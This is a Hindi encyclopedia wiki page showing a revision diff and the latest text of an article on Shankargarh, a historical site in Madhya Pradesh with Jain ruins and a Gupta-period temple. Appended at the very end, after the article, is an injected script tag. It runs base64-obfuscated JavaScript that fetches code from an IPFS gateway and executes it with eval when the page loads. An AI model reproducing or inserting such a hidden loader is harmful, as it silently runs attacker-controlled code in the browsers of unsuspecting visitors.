Difference between revisions of "शंकरगढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *शंकरगढ़ मध्य प्रदेश की भूतपूर्व [[नागौ...' के साथ नया पन्ना बनाया)
 
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''शंकरगढ़''' [[मध्य प्रदेश]] की भूतपूर्व रियासत [[नागौर]] में उचहरा के निकट स्थित एक ऐतिहासिक स्थल है।
*शंकरगढ़ [[मध्य प्रदेश]] की भूतपूर्व [[नागौर]] रियासत में उचहरा के निकट स्थित है।  
+
 
*शंकरगढ़ से मुख्यतः [[जैन]] सम्प्रदाय से सम्बन्धित अनेक ध्वंसावशेष प्राप्त हुए हैं।  
+
*इस स्थान से मुख्यतः [[जैन]] सम्प्रदाय से संबंधित अनेक ध्वंसावशेष प्राप्त हुए हैं।
*पुरातत्त्वविद् राखालदास बनर्जी को यहाँ से एक [[गुप्तकालीन कला और स्थापत्य|गुप्तकालीन]] मंदिर के अवशेष भी मिले हैं।  
+
*पुरातत्त्वविद [[राखालदास बंद्योपाध्याय|राखालदास बनर्जी]] को यहाँ से एक [[गुप्तकालीन कला और स्थापत्य|गुप्तकालीन]] मंदिर के [[अवशेष]] भी मिले हैं। यह मंदिर देवगढ़ के प्रसिद्ध मंदिर के पूर्व का निर्मित है। इसके प्रवेश द्वार की पत्थर की चौखट पर सुंदर नक़्क़ाशी की हुई है, जो [[गुप्त काल|गुप्तकालीन]] मंदिरों की विशेषता है।
*यह मंदिर देवगढ़ के प्रसिद्ध मंदिर के पूर्व का निर्मित है।  
 
*इसके प्रवेशद्वार की पत्थर की चौखट पर सुंदर नक्काशी की हुई है।
 
*जो गुप्तकालीन मंदिरों की विशेषता है।  
 
 
*शंकरगढ़ से प्राप्त होने वाले पत्थर का इस क्षेत्र में निर्मित होने वाली अनेक मूर्तियों के बनाने में प्रयोग किया जाता था।  
 
*शंकरगढ़ से प्राप्त होने वाले पत्थर का इस क्षेत्र में निर्मित होने वाली अनेक मूर्तियों के बनाने में प्रयोग किया जाता था।  
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
+
==संबंधित लेख==
[[Category:नया पन्ना]]
+
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 +
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]][[Category:मध्य प्रदेश]][[Category:ऐतिहासिक स्थल]][[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:49, 7 November 2014

shankaragadh madhy pradesh ki bhootapoorv riyasat nagaur mean uchahara ke nikat sthit ek aitihasik sthal hai.

  • is sthan se mukhyatah jain sampraday se sanbandhit anek dhvansavashesh prapt hue haian.
  • puratattvavid rakhaladas banarji ko yahaan se ek guptakalin mandir ke avashesh bhi mile haian. yah mandir devagadh ke prasiddh mandir ke poorv ka nirmit hai. isake pravesh dvar ki patthar ki chaukhat par suandar naqqashi ki huee hai, jo guptakalin mandiroan ki visheshata hai.
  • shankaragadh se prapt hone vale patthar ka is kshetr mean nirmit hone vali anek moortiyoan ke banane mean prayog kiya jata tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>